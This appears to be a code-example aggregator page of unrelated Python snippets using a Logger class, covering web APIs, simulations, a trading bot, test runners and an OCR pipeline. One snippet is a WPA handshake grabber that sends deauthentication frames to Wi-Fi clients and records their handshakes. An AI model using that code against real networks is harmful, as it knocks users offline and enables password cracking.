    _crypto = None
    _env = ""

    # --------------------------------------------------------------------------
    def __init__(self, env):
        """
        Parameters
        ----------
        env : str
            the environment that the current instance is running
        """
        print("[ENDPOINTS] Initializing...")
        # initialize libraries
        self._env = env
        self._db = DB(self._env, self._workers)
        self._logger = Logger(self._db, self._env)
        self._crypto = Crypto()
        # initialize Flask
        self._app = Flask(__name__)
        self._app.json_encoder = CustomJSONEncoder
        self._api = Api(self._app)
        # hooks: auth check before every request, logging/CORS after
        self._app.before_request(self.detectAuthorization)
        self._app.after_request(self.finishRequest)
        for url in self._endpoints: self.addResource(self._endpoints[url], url)
        print("[ENDPOINTS] Done.")

    # --------------------------------------------------------------------------
    def getApp(self):
        """ Return Flask app

        AWS requires a Elastic Beanstalk app to be an executable app. As for now
        this works.

        Returns
        -------
        Flask
            the flask application for AWS
        """

        return self._app

    # --------------------------------------------------------------------------
    def logRequests(self, rtype, request):
        """ Prepare log messages

        Prepare the messages that we want and use Logger to save them to disk, or
        send a notification.

        Parameters
        ----------
        rtype : int
            response type
        request : Request
            request object that was generated by Flask
        """

        status = "NORMAL"
        if rtype == 404 or rtype == 500: status = "CRITICAL"
        elif rtype == 401: status = "NOAUTH"

        self._logger.log(
            "endpoints", json.dumps({
                "rtype": str(rtype),
                "path": request.path,
                "data": request.data.decode("utf8"),
                "args": request.args.to_dict(),
                "method": request.method,
                "remote_addr": request.remote_addr,
                "headers": request.headers.to_list()
            }), status=status
        )

    # --------------------------------------------------------------------------
    def sendAuthorizationError(self, message, token):
        """ Create the authorization error message

        Generates a error message that is used multiple times in the code.

        Parameters
        ----------
        message : str
            message to be sent
        token : str
            the token that was used in the request

        Returns
        -------
        str
            the returning JSON response as a string
        int
            HTTP response code
        """

        # NOTE(review): `token` is currently unused; kept for interface
        # compatibility with existing callers.
        return (json.dumps({ "error":message }), 401)

    # --------------------------------------------------------------------------
    def isValid(self, session, patient_id):
        """ Check if token is valid

        Uses DB to check if the given token is existing and acive. The `active`
        flag in the DB can hence be used to quickly deactivate a token.

        Parameters
        ----------
        session : str
            the token that was used in the request
        patient_id : str
            the patient ID that was sent with the request

        Returns
        -------
        bool
            IF valid => True, ELSE False
        str
            the patient_id of the user associated with the session
        dict
            the full session dict containing all the information loaded from DB
        """

        # check if token set;
        try:
            if session == "" or patient_id == "":
                return False, "", {}

            session = self._db.getSession(session)
            if session["patient_id"] != patient_id: return False, "", {}
        except Exception:
            # Narrowed from a bare `except:` which would also swallow
            # SystemExit/KeyboardInterrupt; any lookup failure means invalid.
            return False, "", {}

        return True, session["patient_id"], session

    # --------------------------------------------------------------------------
    def detectAuthorization(self):
        """ Check if authorization is valid

        Uses the Flask request to check the header. The `Bearer` header must be
        present and name a valid session_id. Specifically, the function looks for
        the `Authorization: Bearer [SESSION]` header (note the exact format). Finally,
        the function adds `patient_id` and `session` to the request object, to make this
        information available to the system.
        """
        request_path = request.path[len(self._version)+1:]
        header = request.headers.get("Authorization")

        if request_path in self._protected and request.method in self._protected[request_path]:

            # `header` was already fetched above; the previous duplicate
            # lookup was removed.
            if not header:
                return self.sendAuthorizationError("Invalid header. Request registered.", "")
            # bearer or token not set;
            outs = header.split()
            if len(outs) != 2:
                return self.sendAuthorizationError("Invalid authentication. Request registered.", "")
            bearer, session = outs
            auth, patient_id, obj = self.isValid(session, request.headers.get("Patient"))
            if bearer != "Bearer" or not auth:
                return self.sendAuthorizationError("Invalid authentication. Request registered.", session)

            request.patient_id = patient_id
            request.session = session
            request.obj = obj

    # --------------------------------------------------------------------------
    def finishRequest(self, response):
        """ Hook for after response has been prepared

        This function logs the response.

        Parameters
        ----------
        response : Response
            Response object for Flask

        Returns
        -------
        response : Response
            Response object for Flask
        """

        response.headers["Access-Control-Allow-Origin"] = "*"
        response.headers["Access-Control-Allow-Headers"] = "Authorization,Patient"
        self.logRequests(response.status_code, request)
        return response

    # --------------------------------------------------------------------------
    def addResource(self, obj, url):
        """ Add resources to flask_restful

        Injects the API with the endpoints that are given in the `_endpoints`
        attribute.

        Parameters
        ----------
        obj : flask_restful.Resource
            class to inject
        url : str
            Flask formatted endpoint
        """

        print("[ADDED ROUTE]", "/"+self._version+url)
        self._api.add_resource(
            obj,
            "/"+self._version+url,
            resource_class_kwargs={
                "logger":self._logger,
                "db":self._db,
                "crypto": self._crypto,
                "workers": self._workers,
                "request_string": "/"+self._version+url
            }
        )
Beispiel #33
0
def main(n, config, seasonality, log_dir, log_prefix):
    """
    Main loop that runs a simulation. This simulation can be configured by passing
    a configuration dictionary, and specifying where all logs will be written to.

    Parameters
    ----------
    n: int
        The Nth simulation.
    config: dict
        Configuration for the simulation. Should contain the following keys:
        - servers:      List of dictionaries, describing a server pool.
        - process:      Sequence of kinds of servers, describing how a process within
                        the simulation runs.
        - runtime:      Until when the simulation should run.
        - max_volume:   Maximum number of events.
    seasonality: Seasonality
        Seasonality object to use for the simulation. This defines the intervals
        between events.
    log_dir: string
        Path pointing to where all logs should be written.
    log_prefix: string
        Prefix of every log file.

    Returns
    -------
    str
        Name of the log file created for this simulation run.
    """
    # we need a new environment which we can run.
    environment = Environment()

    # we need a server pool
    servers = MultiServers()

    # iterate over all of the servers that need to be configured that
    # we received from the client
    for server in config['servers']:

        # append a new server pool to the multiserver system
        servers.append(
            Servers(environment,
                    size=server['size'],
                    capacity=server['capacity'],
                    kind=server['kind']))

    # we need a logger that will log all events that happen in the simulation
    name = "{0}_{1:04d}_{2}".format(log_prefix, n,
                                    datetime.now().strftime("%Y-%m-%d_%H-%M"))
    logger = Logger(name, directory=log_dir, show_stdout=False, usequeue=False)

    # we also need a logger for all error events that happen in the simulation
    error_logger = Logger(f"error-{name}",
                          directory=log_dir,
                          show_stdout=False)

    # Start QueueListener
    if hasattr(logger, "listener"):
        logger.listener.start()

    # Enter first line for correct .csv headers
    logger.log(
        'Time;Server;Message_type;CPU Usage;Memory Usage;Latency;Transaction_ID;To_Server;Message'
    )
    error_logger.log('Time;Server;Error type;Start-Stop')

    # we can use the logger for the simulation, so we know where all logs will be written
    environment.logger(logger)
    environment.logger(error_logger, type="error")

    # we need a new form of seasonality (rebinds the `seasonality` parameter
    # with a Seasonality object built from it)
    seasonality = Seasonality(seasonality, max_volume=config["max_volume"])

    # now, we can put the process in the simulation
    Processor(environment,
              servers,
              seasonality=seasonality,
              kinds=config['process'])

    # run the simulation with a certain runtime (runtime). this runtime is not equivalent
    # to the current time (measurements). this should be the seasonality of the system.
    # for example, day or week.
    environment.run(until=int(config['runtime']))

    # Stop QueueListener
    if hasattr(logger, "listener"):
        logger.listener.stop()

    return name
Beispiel #34
0
# ----------------------------------------------------------------------------------------------------------------------
# Initialize OS
# ----------------------------------------------------------------------------------------------------------------------
from lib.Kernel import Kernel
from lib.toolkit import load_properties
# Start-up Kernel
kernel = Kernel(load_properties("conf/os.properties"))
log = kernel.logger

# ----------------------------------------------------------------------------------------------------------------------
# Logger
# ----------------------------------------------------------------------------------------------------------------------
import gc
from lib.Logger import Logger

# NOTE(review): this rebinding discards the kernel logger bound above —
# confirm the standalone Logger is intended from here on.
log = Logger()

log.info("Hello!")
log.error("Critical Issue!!")
# gc.free_mem() is a MicroPython API (CPython's gc has no free_mem()) —
# presumably this demo targets a MicroPython board; confirm.
log.debug("Free memory: " + str(gc.free_mem()))

# ----------------------------------------------------------------------------------------------------------------------
# Update DuckDNS
# ----------------------------------------------------------------------------------------------------------------------
from lib.toolkit import update_duck_dns

# Update DuckDNS service with a hard-coded domain, token and IP (demo values)
update_duck_dns("mydomain", "mytoken", "192.168.0.10")

# ----------------------------------------------------------------------------------------------------------------------
#
Beispiel #35
0
class Bot:
	"""This class is an instance of a bot.
	Every bot has a name, a ticker, and period.
	The period can be 1m, 3m, 5m, 15m, 30m, 1h, 2h, 3h, 4h, 1d, 1w.
	A bot can have a period_needed property that will specify how much past data you want at least
	at every loop.
	
	Example: a bot with a time period of 5m and a period_needed of 200 will receive at every loop the 200
	last ticker, 1000 minutes.

	To implement a bot, you just have to override the compute and setup function. Those two functions will be
	called automatically by the timing system.
	Compute will receive the last period_needed candles for the selected asset.

	The data property is a Data object that allows you to store important and persistant information.
	Every important variables or objects should be stored in data, in case the bot is restarted or if the server is down.

	The logger property is an instance of Logger. It allows you to log information in the console and in the
	database and the Dashboard. If you want to log custom metrics, use logger.custom. You will be able to create
	visualizations in Grafana with this logs.

	The config property is the dictionnary with the same name as the bot in the config.

	The exchange property is an instance of Exchange. It allows you to interact with the actual markets.

	The live_mode property indicates if the bot should loop and receive live data. Use it only to test your bot
	live. If you want to backtrack or test your algorithm, leave live_mode = False.
	When live_mode is False, the logger won't log to the DB, and the exchange actions will be simulated.
	"""

	def __init__(self, name, ticker, period, live_mode, periods_needed=200):
		"""
		- name: string, the name of the bot
		- ticker: string, the ticker formatted like that: ASSET1/ASSET2
		- period: string, the period on which the loop will be set, and the resolution of the candles
		- live_mode: bool, should we launch the live loop and start trading live
		- periods_needed: int, the number of candles you will get every loop, optional
		"""
		self.live_mode = live_mode
		self.name = name
		self.ticker = ticker
		self.period_text = period
		self.periods_needed = periods_needed
		# Seconds past the period boundary at which each loop iteration fires.
		self.offset_seconds = 10
		if (not self.name in config.get_config()):
			print("❌ Cannot instantiate bot: no config entry")
			exit(1)
		self.config = config.get_config()[self.name]
		if (not "capitalAllowed" in self.config):
			print("❌ Cannot instantiate bot: no 'capitalAllowed' property")
			exit(1)
		try:
			self.logger = Logger(self.name, live_mode)
		except:
			print("❌ Cannot connect to the log DB, are you sure it's running?")
			raise
		# Backtests use a separate "-test" data namespace so they never
		# pollute the live bot's persisted state.
		if (self.live_mode):
			self.data = Data(self.name)
		else:
			self.data = Data(self.name + "-test")
		self.exchange = Exchange(self.logger, self.data, self.config['capitalAllowed'], live_mode, self.ticker, self.period_text)
		try:
			# period_matching presumably maps period text (e.g. "5m") to a
			# number of minutes — self.period is compared against minute
			# counts below; confirm against its definition.
			self.period = period_matching[period]
		except:
			print("Available periods: 1m, 3m, 5m, 15m, 30m, 1h, 2h, 3h, 4h, 1d, 1w")
			raise
		self.logger.log("ℹ️", f"Bot {self.name} started with a period of {period}")
		self.logger.log("ℹ️", f"Capital allowed: {self.config['capitalAllowed']}%")
		self.setup()
		if (self.live_mode):
			self.preloop()

	def preloop(self):
		"""Waits for the selected period to begin. We use UTC time.

		NOTE(review): this is a busy-wait (no sleep), so it spins at 100% CPU
		until the period boundary is hit — confirm this is acceptable.
		"""
		while (1):
			current_time = datetime.datetime.utcnow()
			if (self.period < 60):
				# Sub-hour periods: fire when the minute is aligned.
				if (current_time.minute % self.period == 0 and current_time.second == self.offset_seconds):
					self.loop()
			elif (self.period <= 4 * 60):
				# 1h to 4h periods: fire on aligned hours.
				hour_offset = int(self.period / 60)
				if (current_time.hour % hour_offset == 0 and current_time.minute == 0 and current_time.second == self.offset_seconds):
					self.loop()
			elif (self.period <= 1 * 60 * 24):
				# Daily period: fire at 00:00 UTC.
				if (current_time.hour == 0
					and current_time.minute == 0
					and current_time.second == self.offset_seconds):
					self.loop()
			else:
				# Weekly period: fire Monday 00:00 UTC (weekday() == 0).
				if (current_time.weekday() == 0
					and current_time.hour == 0
					and current_time.minute == 0
					and current_time.second == self.offset_seconds):
					self.loop()

	def loop(self):
		"""Once we waited for the period to start, we can loop over the periods. At every period we
		call compute with the latest data.
		"""
		while (1):
			current_time = datetime.datetime.utcnow()
			self.logger.log("ℹ️", f"Downloading latest data at {current_time}")
			data = self.exchange.get_latest_data(self.ticker, self.period_text, self.periods_needed)
			self.logger.price(data.iloc[-1]['close'])
			self.compute(data)
			# NOTE(review): mixes utcnow() above with local now() here for the
			# sleep computation — confirm this is intentional.
			time.sleep(self.offset_seconds + self.period * 60 - datetime.datetime.now().second)

	def backtest(self, start_date, end_date):
		"""Replay historical candles through compute() against a simulated exchange.

		Returns (fake_balance, fake_pnl, hist) where hist is a DataFrame of
		date/price rows with an 'action' column set where fake orders fired.
		"""
		self.exchange.init_fake_balance()
		self.data.reset()
		price = []
		date = []
		data = self.exchange.get_data(start_date, end_date, self.ticker, self.period_text)
		if (data.shape[0] == 0):
			self.logger.log("❌", "No data for the given time frame")
		# Slide a window of periods_needed candles over the history.
		for i in range(self.periods_needed, data.shape[0]):
			batch = data.iloc[i - self.periods_needed:i]
			self.exchange.fake_current_price = batch.iloc[-1]['close']
			self.exchange.fake_current_date = batch.iloc[-1]['date']
			price.append(batch.iloc[-1]['close'])
			date.append(batch.iloc[-1]['date'])
			self.compute(batch.copy())
		hist = pd.DataFrame()
		hist['date'] = date
		hist['price'] = price
		for order in self.exchange.fake_orders:
			hist.loc[hist['date'] == order['date'], 'action'] = order['action']
		return (self.exchange.fake_balance, self.exchange.fake_pnl, hist)

	def setup(self):
		"""To implement. Set the bot variable, instantiate classes... This will be done once before the bot
		starts.
		"""
		pass

	def compute(self, data):
		"""To implement. Called every period, you have the latest data available. You can here take decisions.
		"""
		pass
Beispiel #36
0
from lib.Logger import Logger
import logging


def suites():
    """Assemble the unittest suite of currently-enabled test cases."""
    loader = unittest.TestLoader()
    enabled_cases = [WeatherTest]
    # Disabled for now: BugfreeImportFile, ProductAdd, LoginLogoutTest
    collected = unittest.TestSuite()
    for case in enabled_cases:
        collected.addTests(loader.loadTestsFromTestCase(case))
    return collected


if __name__ == "__main__":
    logger = Logger(loglevel=logging.ERROR).getlog()
    logger.info('日志开始')

    # Build the suite before opening the report so a failure here cannot
    # leave an empty report file behind.
    suite = suites()
    report_path = './reports/results_%s.html' % time.strftime("%Y-%m-%d %H-%M-%S")
    # `with` guarantees the report file is closed even if the runner raises.
    # The old try/finally used Python-2 `except Exception, e` (a syntax error
    # on Python 3) and could hit an unbound `fp` in finally when open() failed.
    with open(report_path, 'wb') as fp:
        runner = HTMLTestRunner(stream=fp,
                                title=u'接口测试报告',
                                description=u"测试用例执行情况:")
        runner.run(suite)
from lib.ApacheJiraParser import ApacheJiraParser
import pycurl
from lib.Logger import Logger

# for a in range(890,894):
#     parser = ApacheJiraParser('SENTRY-' + str(a))
#     parser.parse().write()

# Scrape and persist HIVE JIRA issues in the given ID range.
# Create the logger once, outside the loop (it was previously rebuilt on
# every iteration for no benefit).
logger = Logger(__name__)

for a in range(9525, 14240):
    parser = ApacheJiraParser('hive', a)

    try:
        parser.parse().write()
    except pycurl.error as err:
        # Fetch/parse failure for one issue: log it and continue with the rest.
        logger.error("Unable to parse JIRA: %s", 'HIVE-' + str(a))
        logger.error("Error: %s", str(err))
Beispiel #38
0
class E2ERunner(object):
    """Configurable end-to-end pipeline runner.

    Parses a configuration into processing blocks, an optional visualizer,
    an optional ground-truth provider and evaluators, then executes the
    chain over a set of input image files.
    """

    def __init__(self, config=None, globalConfig=None):
        """Build the runner from two configuration dicts.

        Defaults are None sentinels instead of `{}`: a mutable default
        argument would be shared across every call (classic Python pitfall).
        Passing {} explicitly still behaves exactly as before.
        """
        self.config = Configuration(config if config is not None else {})
        self.globalConfig = Configuration(
            globalConfig if globalConfig is not None else {})
        self._parse_config()
        self.logger = Logger()
        self.config()

    def _parse_config(self):
        # Materialize blocks, visualizer, ground truth and evaluators from config.
        self._parse_blocks(self.config["blocks"])
        self.viz = self._parse_visualizer(self.config.default("viz", None))
        self.gtprov = self._parse_gt(self.config.default("gt", None))
        self.evals = self._parse_evals(self.config.default('eval', []))

    def _parse_blocks(self, blocks):
        # Skip blocks explicitly marked "disabled".
        self.blocks = [
            self._parse_block(block) for block in blocks
            if "disabled" not in block or not block["disabled"]
        ]

    def _parse_block(self, block):
        # Factory: map a config "type" to its processing-block class.
        if block["type"] == "TextSeparation":
            return TextSeparation(self.globalConfig, block)
        elif block["type"] == "WordDetection":
            return WordDetection(block)
        elif block["type"] == "LineSegmentation":
            return LineSegmentation(block)
        elif block["type"] == "ParagraphDetection":
            return ParagraphDetection(block)
        elif block["type"] == "UnigramLanguageModel":
            return UnigramLanguageModel(block)
        elif block["type"] == "Ceiling":
            return Ceiling(block)
        elif block["type"] == "TranscriptionAndClassification":
            return TranscriptionAndClassification(self.globalConfig, block)

    def _parse_evals(self, eval_configs):
        return [self._parse_eval(config) for config in eval_configs]

    def _parse_eval(self, config):
        # Factory: map a config "type" to its evaluator class.
        if config is None:
            return None
        if config["type"] == "IoU":
            return IoU(config)
        elif config["type"] == "IoUPixelSum":
            return IoUPixelSum(config)
        elif config["type"] == "BagOfWords":
            return BagOfWords(config)
        elif config["type"] == "IoUCER":
            return IoUCER(config)

    def _parse_data(self, data_config):
        # Either an explicit list of files, or a directory scan filtered by
        # prefix/suffix and optionally truncated by "limit".
        if isinstance(data_config, list):
            return data_config
        else:
            prefix = data_config["prefix"] if "prefix" in data_config else ""
            filenames = list(
                filter(
                    lambda f: f.endswith(data_config["suffix"]) and f.
                    startswith(prefix), os.listdir(data_config["path"])))
            if data_config["limit"] > 0:
                filenames = filenames[:data_config["limit"]]
            return [
                os.path.join(data_config["path"], filename)
                for filename in filenames
            ]

    def _parse_visualizer(self, viz_config):
        # Factory: map a config "type" to its visualizer class.
        if viz_config is None:
            return None
        if viz_config["type"] == "RegionVisualizer":
            return RegionVisualizer(viz_config)
        elif viz_config["type"] == "ImageVisualizer":
            return ImageVisualizer(viz_config)
        elif viz_config["type"] == "SeparatedVisualizer":
            return SeparatedVisualizer(viz_config)

    def _parse_gt(self, gt_config):
        # Factory: map a config "type" to its ground-truth provider.
        if gt_config is None:
            return None
        if gt_config["type"] == "WordRegion":
            return WordRegionGTProvider()
        elif gt_config["type"] == "ParagraphRegion":
            return ParagraphRegionGTProvider()
        elif gt_config["type"] == "LineRegion":
            return LineRegionGTProvider()

    def __call__(self, log_prefix="E2E", skip_range_evaluation=False):
        """Run the pipeline over all configured files; returns per-file results."""
        if not skip_range_evaluation and self.config.default("ranger", False):
            self.logger.write("Entering Range Execution Mode")
            return self._range_exec()
        start = time()
        self.scores = {}
        data = self._parse_data(self.config["data"])
        results = []
        times = []
        for idx, file in enumerate(data):
            file_time = time()
            self.logger.progress(log_prefix, idx, len(data))
            results.append(self._exec(file))
            times.append(time() - file_time)
        [block.close() for block in self.blocks]
        if len(self.evals) > 0:
            final_scores = {
                "time": time() - start,
                "median time": np.median(times),
                "avg time": np.average(times)
            }
            for score_key in self.scores:
                final_scores[score_key] = np.average(self.scores[score_key])
            self.logger.summary(log_prefix, final_scores)
        return results

    def _get_range(self):
        # Only dict-style ranges (from/to/step) are supported here.
        if type(self.config["ranger.values"]) is dict:
            return frange(self.config["ranger.values.from"],
                          self.config["ranger.values.to"],
                          self.config["ranger.values.step"])

    def _range_exec(self):
        # Sweep a config value over a range, re-running the pipeline per value.
        def set_config(value):
            for path in self.config.default(
                    "ranger.paths", [self.config.default("ranger.path", [])]):
                current = self.config
                for step in path[:-1]:
                    current = current[step]
                current[path[-1]] = value
            self._parse_config()

        for val in self._get_range():
            set_config(val)
            prefix = self.config.default("ranger.template", "value {}")
            self(log_prefix=prefix.format(val), skip_range_evaluation=True)

    def _exec(self, file):
        """Run all blocks on one image file; optionally visualize and evaluate."""
        original = cv2.imread(file)
        last_output = original.copy()

        for block in self.blocks:
            last_output = block(last_output, file)
        res = {"file": file, "original": original, "result": last_output}
        # NOTE(review): `gt` is only bound when a ground-truth provider is
        # configured; configs with evaluators but no "gt" would raise
        # NameError below — confirm evaluators always come with a gt config.
        if self.gtprov is not None:
            gt = self.gtprov(file, original)
        if self.viz is not None:
            vizimage = res["original"].copy()
            if self.gtprov is not None and self.config.default(
                    'gt.viz', False):
                vizimage = self.viz(vizimage, gt, True)
            if len(self.blocks) > 0:
                vizimage = self.viz(vizimage, res["result"], False)
            self.viz.store(vizimage, file)
            res["viz"] = vizimage
        if len(self.evals) > 0:
            for evl in self.evals:
                scores = evl(gt, res["result"])
                for score_key in scores.keys():
                    self.scores[score_key] = [
                        scores[score_key]
                    ] if score_key not in self.scores else [
                        scores[score_key], *self.scores[score_key]
                    ]
        return res
Beispiel #39
0
 def __init__(self, config={}, globalConfig={}):
     # NOTE(review): appears to be a duplicate of E2ERunner.__init__ found
     # elsewhere in this file; the mutable default arguments ({}) are shared
     # across calls — confirm intended before reuse.
     self.config = Configuration(config)
     self.globalConfig = Configuration(globalConfig)
     self._parse_config()
     self.logger = Logger()
     self.config()
    def run(form):
        """Main capture loop: scan for APs, lock onto one with active clients,
        deauth its targets and record traffic until a WPA handshake is seen.

        State machine: 'scanning' -> 'ap_locked' -> back to 'scanning' once a
        handshake is captured for the locked AP.
        """
        form.status_text.value = "Looking for an AP with active users"

        # Raw 802.11 socket on the monitor-mode interface (ETH_P_ALL = 0x0003).
        s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(0x0003))
        s.bind((form.interface, 0x0003))

        # BSSIDs for which a handshake was already collected.
        mac_collected = []

        ap_manager = APManager()
        current_state = 'scanning'

        pcap_file = None
        
        last_deauth = None

        while True:
            packet = WpaHandshakeGrabber.getFrame(s)
            frame = Radiotap802_11(packet)

            if current_state == 'scanning':
                if frame.isBeaconFrame():
                    ap = AccessPoint(frame.ssid, frame.channel, frame.bssid_id)
                    ap_manager.addAP(ap)
                elif frame.isAckBlockFrame(): # NOTE: duplicated in the 'ap_locked' branch below; consider hoisting
                    target = Target(frame.destination)
                    ap_manager.addTarget(target, frame.source)

                # NOTE(review): `is not 0` is an identity test and is True for
                # any object (including None, which locked_ap is set to after a
                # capture) — likely intended `is not None`; confirm before changing.
                if ap_manager.update() and frame.source not in mac_collected and ap_manager.locked_ap is not 0:
                    current_state = 'ap_locked'

                    # Re-home the monitor interface onto the locked AP's channel.
                    # (Marked "Move me" by the original author.)
                    root_dev_name = form.interface.split('mon')[0]
                    Logger.log('Root dev name = {}'.format(root_dev_name))
                    Logger.log('Switching monitor to channel {}'.format(ap_manager.locked_ap.channel))
                    process = subprocess.Popen("airmon-ng stop {};airmon-ng start {} {}".format(form.interface, root_dev_name, ap_manager.locked_ap.channel), shell=True, stdout=subprocess.PIPE)
                    process.wait()

                    # Restarting airmon-ng invalidates the socket; rebind.
                    s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(0x0003))
                    s.bind((form.interface, 0x0003))

                    last_deauth = None
                    pcap_file = WpaHandshakeGrabber.startPcap(ap_manager.locked_ap)
                    WpaHandshakeGrabber.switchToLockedTargetView(form, ap_manager.locked_ap.ssid)
            elif current_state == 'ap_locked':
                # Record every frame while locked so the handshake lands in the pcap.
                WpaHandshakeGrabber.writePcap(pcap_file, packet)

                if frame.isAckBlockFrame(): # NOTE: same duplication as in the 'scanning' branch above
                    target = Target(frame.destination)
                    ap_manager.addTarget(target, frame.source)

                # Heuristic handshake detection: QoS frame of exactly 163 bytes
                # addressed to the locked AP.
                if frame.isQOSFrame() and len(packet) == 163 and frame.destination == ap_manager.locked_ap.mac:
                    Logger.log('Handshake Found on {}'.format(ap_manager.locked_ap.ssid))
                    current_state = 'scanning'
                    mac_collected.append(ap_manager.locked_ap.mac)
                    ap_manager.locked_ap = None
                    last_deauth = None

                    # Restore the interface to channel-hopping scan mode.
                    root_dev_name = form.interface.split('mon')[0]
                    process = subprocess.Popen("airmon-ng stop {};airmon-ng start {}".format(form.interface, root_dev_name), shell=True, stdout=subprocess.PIPE)
                    process.wait()
                    s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(0x0003))
                    s.bind((form.interface, 0x0003))
                    continue
                
                # Deauth one target at most once a minute to provoke a re-handshake.
                if last_deauth is None or time.time() - last_deauth > 60:
                    last_deauth = time.time()
                    target = ap_manager.locked_ap.targets.pop()
                    deauth_frame = Deauth.getDeauthFrame(ap_manager.locked_ap, target)
                    WpaHandshakeGrabber.writePcap(pcap_file, packet)
                    for x in range(0, 3):
                        s.send(deauth_frame)
                            
            
            WpaHandshakeGrabber.updateUI(form, current_state, ap_manager)
class Renderer(object):
  """Base renderer: manages output/tmp directories, timestamped filenames
  and colorized logging for subclasses that produce audio/PDF artifacts."""

  def __init__(self, 
      audio_player=AUDIO_PLAYER, 
      pdf_viewer=PDF_VIEWER, 
      output_directory=OUTPUT_DIR, 
      tmp_directory=TMP_DIRECTORY,
      clean=False,
      verbose=False, 
      log_output="stderr",
      **kwargs):
    """Create the renderer, ensuring output_directory exists.

    clean=True wipes output_directory (debugging aid); verbose enables
    per-file removal logging in filename_clean().
    """
    self._verbose = verbose
    self._logger = Logger(log_output=log_output, role=self.__class__.__name__)
    # One timestamp shared by every filename this instance generates.
    self._time_str = str(int(time.time()))

    self.audio_player = audio_player
    self.pdf_viewer = pdf_viewer
    self.output_directory = output_directory
    # BUG FIX: previously assigned the module constant TMP_DIRECTORY,
    # silently ignoring the tmp_directory parameter.
    self.tmp_directory = tmp_directory
    if not os.path.isdir(self.output_directory):
      try:
        os.mkdir(self.output_directory)
      except OSError as e:
        # NOTE(review): reached for any mkdir failure (permissions, missing
        # parent, ...), not only a pre-existing path — message may mislead.
        self.log("The path {} already exists.\n"
          "Clear that path or specify a different directory name.".format(self.output_directory)
        )
    if clean:
      self.filename_clean()  # for debugging

  def log(self, m, header_color="", color=""):
    """Forward a message to the shared logger with this instance's timestamp."""
    self._logger.log(m, header_color=header_color, color=color, time_str=self._time_str)

  def log_warn(self, m):
    m = "WARNING:{}".format(m)
    self.log(m, header_color=self._logger.RED_WHITE, color=self._logger.YELLOW) 

  def log_err(self, m):
    m = "ERROR:{}".format(m)
    self.log(m, header_color=self._logger.RED_WHITE, color=self._logger.RED) 

  def log_info(self, m):
    self.log(m, header_color=self._logger.GREEN, color=self._logger.GREEN)

  def filename_new(self, ext, filename=None):
    """Return a path in output_directory; defaults to the instance timestamp."""
    if not filename:
      filename = self._time_str
    return "{}.{}".format(os.path.join(self.output_directory, filename), ext)

  def filename_temporary_new(self, ext, filename=None):
    """Return a path in tmp_directory; defaults to the instance timestamp."""
    if not filename:
      filename = self._time_str
    return "{}.{}".format(os.path.join(self.tmp_directory, filename), ext)

  def filename_clean(self):
    """Remove every file currently in output_directory."""
    for f in os.listdir(self.output_directory):
      if self._verbose:
        self.log("Removing {}...".format(f), color=self._logger.BLUE, header_color=self._logger.BLUE)
      os.unlink(os.path.join(self.output_directory, f))

  def _reset_term(self, dummy_a, dummy_b):
    # Signal-handler shape (two ignored args); resets the terminal state.
    call(["reset", "-I"])
Beispiel #42
0
                        help='date to continue for',
                        default=MODEL_DATE)
    parser.add_argument('--paper-note-path',
                        default='../paper-notes/data/words')
    parser.add_argument('--model-epoch',
                        help='epoch to continue for',
                        default=MODEL_EPOCH,
                        type=int)
    args = parser.parse_args()

    # TRAINING
    LOG_NAME = '{}-{}'.format("otf-iam-paper", args.model_date)
    model_folder = os.path.join(Constants.MODELS_PATH, LOG_NAME)
    models_path = os.path.join(model_folder,
                               'model-{}'.format(args.model_epoch))
    logger = Logger()
    config = Configuration.load(model_folder, "algorithm")
    algorithm = HtrNet(config['algo_config'])
    dataset = PreparedDataset.PreparedDataset(config['dataset'], False,
                                              config['data_config'])

    algorithm.configure(batch_size=config['batch'],
                        learning_rate=config['learning_rate'],
                        sequence_length=dataset.max_length,
                        image_height=dataset.meta["height"],
                        image_width=dataset.meta["width"],
                        vocab_length=dataset.vocab_length,
                        channels=dataset.channels,
                        class_learning_rate=config.default(
                            'class_learning_rate', config['learning_rate']))
    executor = Executor(algorithm, True, config, logger=logger)
    def __getLogger(self):
        """Return the red-dots raw-file logger, creating it on first use."""
        cached = self.__logger
        if cached:
            return cached
        self.__logger = Logger.openInAppendMode(self.__folderStruct.getRedDotsRawFilepath())
        return self.__logger
	def __init__(self):
		"""Set up the file logger for house data."""
		log_factory = Logger(logname='/var/log/houseData.log', loglevel=1, logger="houseDataLogger")
		self.logger = log_factory.getLogger()
Beispiel #45
0
from lib.EncryptUtil import EncryptUtil
# NOTE(review): dir_sign is presumably defined earlier in this module — confirm.
pub_key_path = dir_sign + '/lib/pub.key'
pri_key_path = dir_sign + '/lib/pri.key'
enc = EncryptUtil(pub_key_path, pri_key_path)

from django.shortcuts import render
import json
from django.http import HttpResponse
from lib.Logger import Logger
import time
# 1. Receive the POST request and decrypt it.
# 2. Extract custId, custNm and recevieUrl, generate a new traceNo, and build
#    the POST response message returned to pjs.
# 3. POST to the matching pjs environment according to recevieUrl.
# 4. Build the XML message and send it to the pjs front-end machine
#    (not implemented for now).

log_debug = Logger('all.log', level='debug')
log_error = Logger('error.log', level='error')

# Template response for the T036 (recharge-confirmation) transaction; empty
# fields are filled in per request. Values are runtime protocol strings.
dict_t036 = {
    "orgCode": "105584099990002",
    "custId": "",
    "traceNo": "",
    "reqSn": '',
    "retcode": "00000",
    "errCode": "0000",
    "errMsg": "处理成功",
    "settleDay": "",
    "retMsg": "充值确认交易成功."
}